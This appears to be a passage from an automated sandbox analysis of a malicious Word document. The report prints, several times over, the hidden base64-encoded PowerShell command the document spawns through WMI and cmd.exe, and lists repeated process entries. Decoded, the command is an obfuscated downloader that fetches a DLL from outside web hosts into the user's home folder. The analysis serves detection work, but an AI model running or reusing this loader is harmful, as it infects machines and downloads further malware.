AHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJJump to behavior
Suspicious powershell command line foundShow sources
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJ
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAYwBWAE4AZwBBAFMAPQAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADAAfQB7ADMAfQB7ADIAfQAiAC0ARgAgACcAWQBTAFQAZQBNAC4ASQAnACwAJwBTACcALAAnAFIAeQAnACwAJwBPAC4ARABpAHIARQBDAFQAbwAnACkAOwAgACAAIABzAGUAdAAtAEkAVABFAE0AIAAoACIAdgBhAHIAaQBhAEIAbABlACIAKwAiADoAbAA2AFUAIgArACIAWQBIACIAKwAiAE4AIgApACAAIAAoAFsAVABZAHAAZQBdACgAIgB7ADUAfQB7ADAAfQB7ADcAfQB7ADQAfQB7ADgAfQB7ADIAfQB7ADMAfQB7ADYAfQB7ADEAfQAiAC0ARgAgACcAWQAnACwAJwBHAGUAcgAnACwAJwBFAFAAbwBJACcALAAnAE4AdABtACcALAAnAFQARQBNAC4ATgBlAHQALgBzAGUAJwAsACcAcwAnACwAJwBBAG4AQQAnACwAJwBzACcALAAnAFIAdgBJAGMAJwApACkAOwAgACQAWABkAHoAXwB0AF8AaQA9ACgAJwBBAHUAJwArACgAJwB6ADAAegAnACsAJwBxAHgAJwApACkAOwAkAFAAaQBpADgAbwBlAG4APQAkAEIAMAB4AGsAMAA0AHIAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAFYAYQBsADYAcQBhAHgAOwAkAEwAcgBfAGwAcQBuAHcAPQAoACgAJwBQAGsAJwArACcAOQAnACkAKwAoACcAMQAnACsAJwA1AHcAJwApACsAJwBvACcAKQA7ACAAKAAgACAAaQBUAEUATQAgAHYAYQByAEkAQQBCAGwARQA6AEMAdgBuAGcAQQBTACkALgB2AEEAbABVAEUAOgA6ACIAQwBSAEUAQQBUAGUAYABkAGkAYABSAGUAQwB0AE8AUgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAnACsAJwAwAH0AWQAnACsAJwA1ACcAKwAnADUAOQBqAHMAdgB7ADAAfQBJAGUAdwBmAG0AeQAzACcAKwAnAHsAJwArACcAMAB9ACcAKQAgACAALQBGAFsAQwBIAGEAUgBdADkAMgApACkAOwAkAE0AXwBkAG4AYgBzADQAPQAoACcAUQAnACsAKAAnAHUAJwArACcAZwBzACcAKQArACgAJwB5AG8AJwArACcAZAAnACkAKQA7ACAAIAAoAEcAZQB0AC0AaQBUAGUAbQAgACgAIgB2AGEAUgBJAGEAQgBMAGUAIgArACIAOgBsADYAdQAiACsAIgBZAEgAIgArACIAbgAiACkAKQAuAHYAYQBMAHUARQA6ADoAIgBzAEUAQwB1AFIAYABJAFQAYAB5AHAAcgBPAFQAYABvAGMATwBMACIAIAA9ACAAKAAoACcAVABsACcAKwAnAHMAJwApACsAJwAxADIAJwApADsAJABYADIAdABoAHEAbQBnAD0AKAAnAEoAJwArACgAJwB6AHoAJwArACcAegA2ACcAKwAnADIAbQAnACkAKQA7ACQAUQBvAGMAeQBfAGIAZwAgAD0AIAAoACgAJwBQAHAAJwArACcAbgBxACcAKQArACcAOQBqACcAKQA7ACQAWgB5ADcAegA3AGgAZAA9ACgAJwBGAGcAJwArACcAMAA0ACcAKwAoACcAYwBjACcAKwAnAGcAJwApACkAOwAkAEUANQBwAGEAbQA0AGUAPQAoACcAVwBpACcAKwAoACcAMAAnACsAJwA4AGoAJwApACsAJwBhAHkAJwApADsAJABUAHAAZAB1AGUAMwAyAD0AJABIAE8ATQBFACsAKAAoACgAJwBNAFIAUABZACcAKwAnADUANQAnACkAKwAoACcAOQBqACcAKwAnAHMAJwApACsAJwB2ACcAKwAnAE0AJwArACgAJwBSACcAKwAnAFAASQAnACkAKwAnAGUAJwArACgAJwB3AGYAbQAnACsAJwB5ADMAJwApACsAKAAnAE0AUgAnACsAJwBQACcAKQApAC4AIgBSAGUAYABQAEwAYQBDAEUAIgAoACgAJwBNACcAKwAnAFIAUAAnACkALAAnAFwAJwApACkAKwAkAFEAbwBjAHkAXwBiAGcAKwAoACcALgBkACcAKwAnAGwAbAAnACkAOwAkAFIANgB1AHQAdgB5AGwAPQAoACgAJwBHACcAKwAnAHAAcgAnACkAKwAoACcAcwAnACsAJwA3ADkAJwApACsAJwBqACcAKQA7ACQAWgAxAGYAbQB2AHEAaAA9AE4AYABlAGAAdwAtAE8AQgBKAGUAYABDAFQAIABOAEUAVAAuAHcARQBCAGMAbABJAGUATgB0ADsAJABOAHkANABtAG4AdgB4AD0AKAAoACcAaAAnACsAKAAoACcAdAAnACsAJwB0AHAAOgBxAHEAKQAoACcAKQApACsAKAAoACcAcwAnACsAJwAyACkAKABxAHEAJwApACkAKwAnACkAJwArACgAKAAnACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAnACsAJwAoAG8AcAAnACkAKQArACgAJwBoACcAKwAnAGUAbABpACcAKQArACcAYQAnACsAKAAnAHMAYgAnACsAJwByAGUAJwArACcAdwBlAHIAeQAnACsAJwAuACcAKQArACcAYwAnACsAJwBvAG0AJwArACcAcQAnACsAJwBxACcAKwAoACgAJwApACgAJwArACcAcwAyACcAKQApACsAKAAoACcAKQAoAHcAJwArACcAcAAtACcAKQApACsAKAAnAGkAbgAnACsAJwBjACcAKQArACcAbAAnACsAKAAnAHUAJJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFA16253AAA push eax; retf 5_2_00007FFA16253AF1

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
